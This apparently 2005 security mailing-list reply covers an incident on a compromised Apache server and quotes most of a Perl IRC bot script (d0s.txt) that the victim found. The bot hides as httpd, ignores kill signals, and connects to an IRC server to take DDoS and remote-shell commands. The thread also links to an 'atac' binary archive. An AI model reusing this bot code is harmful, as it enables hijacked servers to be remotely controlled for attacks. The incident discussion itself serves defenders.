<<< Date Index >>>     <<< Thread Index >>>

Re: Apache hacks (./atac, d0s.txt)



Take a look at these links:

http://lists.virus.org/full-disclosure-0412/msg00541.html

http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html

Are your systems patched (apache) ? Do you run any
application that might be vulnerable?

One thing I know is that this perl script is crearly
made by some brazilian people..

--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com

 --- Andrew Y Ng <ayn@xxxxxxxxxxxx> escreveu: 
> My server has been seeing some usual activities
> today, I don't have much time
> to get down to the bottom of things, but after I
> investigated briefly I have
> decided to disable PERL executable permission for
> www-data (Apache process's
> user), also locked /var/tmp so www-data cannot write
> to it. 
> 
> Looks like it ignores all the `kill` signals, not
> sure how I can actually
> kill it...
> 
> 
> I found the included script in /var/tmp called
> d0s.txt.
> 
> I found a bunch of processes called ./atac 20
> running, and found the
> following content in /tmp/atac:
> 
> http://andrewng.com/tmp/atac.tbz
> 
> here's d0s.txt:
> 
> #!/usr/bin/perl
> ################ CONFIGURACAO
>
#################################################################
> my $processo = '/usr/local/apache/bin/httpd -DSSL'; 
> # Nome do processo que vai aparece no ps       #
>
#----------------------------------------------################################################
> my $MODOME='+pi';                               # 
> Modo Do Bot                                 #       
>            
>
#----------------------------------------------################################################
> my $linas_max='10';                            #
> Evita o flood :) depois de X linhas          #
>
#----------------------------------------------################################################
> my $sleep='3';                                 # ele
> dorme X segundos                         #
> ##################### IRC
>
#####################################################################
> my @adms=("DDOS");                           # Nick do
> administrador                        #
>
#----------------------------------------------################################################
> my @canais=("#bots ddos");# Canais                  
>                     #
>
#----------------------------------------------################################################
> my $nick='b0t';                           # Nick do
> bot. Caso esteja em uso vai aparecer #
> #                                              #
> aparecer com numero radonamico no final      #
>
#----------------------------------------------################################################
> my $ircname = 'b0t';                      # User ID 
>                                     #
>
#----------------------------------------------################################################
> my $realname = '4Admin14: 4#DDOS';     
>                                #
>
#----------------------------------------------################################################
> $servidor='irc.gigachat.net' unless $servidor; #
> Servidor de irc que vai ser usado            #
> #                                              #
> caso não seja especificado no argumento      #
>
#----------------------------------------------################################################
> my $porta='6667';                            # Porta do
> servidor de irc                     #
> ################ ACESSO A SHELL
>
###############################################################
> my $secv = 1;                                # 1/0
> pra habilita/desabilita acesso a shell   #
>
###############################################################################################
> 
> my $VERSAO = '1.0';
> 
> $SIG{'INT'} = 'IGNORE';
> $SIG{'HUP'} = 'IGNORE';
> $SIG{'TERM'} = 'IGNORE';
> $SIG{'CHLD'} = 'IGNORE';
> $SIG{'PS'} = 'IGNORE';
> 
> use IO::Socket;
> use Socket;
> use IO::Select;
> chdir("/");
> $servidor="$ARGV[0]" if $ARGV[0];
> $0="$processo"."\0"x16;;
> my $pid=fork;
> exit if $pid;
> die "Problema com o fork: $!" unless defined($pid);
> 
> 
> 
> our %irc_servers;
> our %DCC;
> my $dcc_sel = new IO::Select->new();
> 
> 
> $sel_cliente = IO::Select->new();
> sub sendraw {
>   if ($#_ == '1') {
>     my $socket = $_[0];
>     print $socket "$_[1]\n";
>   } else {
>       print $IRC_cur_socket "$_[0]\n";
>   }
> }
> 
> sub conectar {
>    my $meunick = $_[0];
>    my $servidor_con = $_[1];
>    my $porta_con = $_[2];
> 
>    my $IRC_socket =
> IO::Socket::INET->new(Proto=>"tcp",
> PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
> return(1);
>    if (defined($IRC_socket)) {
>      $IRC_cur_socket = $IRC_socket;
> 
>      $IRC_socket->autoflush(1);
>      $sel_cliente->add($IRC_socket);
> 
>      $irc_servers{$IRC_cur_socket}{'host'} =
> "$servidor_con";
>      $irc_servers{$IRC_cur_socket}{'porta'} =
> "$porta_con";
>      $irc_servers{$IRC_cur_socket}{'nick'} =
> $meunick;
>      $irc_servers{$IRC_cur_socket}{'meuip'} =
> $IRC_socket->sockhost;
>      nick("$meunick");
>      sendraw("USER $ircname
> ".$IRC_socket->sockhost." $servidor_con
> :$realname");
>      sleep 1;
>    }
> 
> }
> my $line_temp;
> while( 1 ) {
>    while (!(keys(%irc_servers))) { conectar("$nick",
> "$servidor", "$porta"); }
>    delete($irc_servers{''}) if
> (defined($irc_servers{''}));
>    &DCC::connections;
>    my @ready = $sel_cliente->can_read(0);
>    next unless(@ready);
>    foreach $fh (@ready) {
>      $IRC_cur_socket = $fh;
>      $meunick =
> $irc_servers{$IRC_cur_socket}{'nick'};
>      $nread = sysread($fh, $msg, 4096);
>      if ($nread == 0) {
>         $sel_cliente->remove($fh);
>         $fh->close;
>         delete($irc_servers{$fh});
>      }
>      @lines = split (/\n/, $msg);
> 
>      for(my $c=0; $c<= $#lines; $c++) {
>        $line = $lines[$c];
>        $line=$line_temp.$line if ($line_temp);
>        $line_temp='';
>        $line =~ s/\r$//;
>        unless ($c == $#lines) {
>          parse("$line");
>        } else {
>            if ($#lines == 0) {
>              parse("$line");
>            } elsif ($lines[$c] =~ /\r$/) {
>                parse("$line");
>            } elsif ($line =~ /^(\S+) NOTICE AUTH
> :\*\*\*/) {
>                parse("$line");
>            } else {
>                $line_temp = $line;
>            }
>        }
>       }
>    }
> }
> 
> 
>  
> sub parse {
>    my $servarg = shift;
>    if ($servarg =~ /^PING \:(.*)/) {
>      sendraw("PONG :$1");
>    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
> PRIVMSG (.+?) \:(.+)/) {
>        my $pn=$1; my $onde = $4; my $args = $5;
>        if ($args =~ /^\001VERSION\001$/) {
>          notice("$pn", "\001Bot powered by DDOS
> TEAM\001");
>        }
>        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
>          if ($onde eq "$meunick"){
>            shell("$pn", "$args");
>          }
>          if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
> ) {
> 
=== message truncated === 


        
        
                
Yahoo! Acesso Grátis - Internet rápida e grátis. 
Instale o discador agora! http://br.acesso.yahoo.com/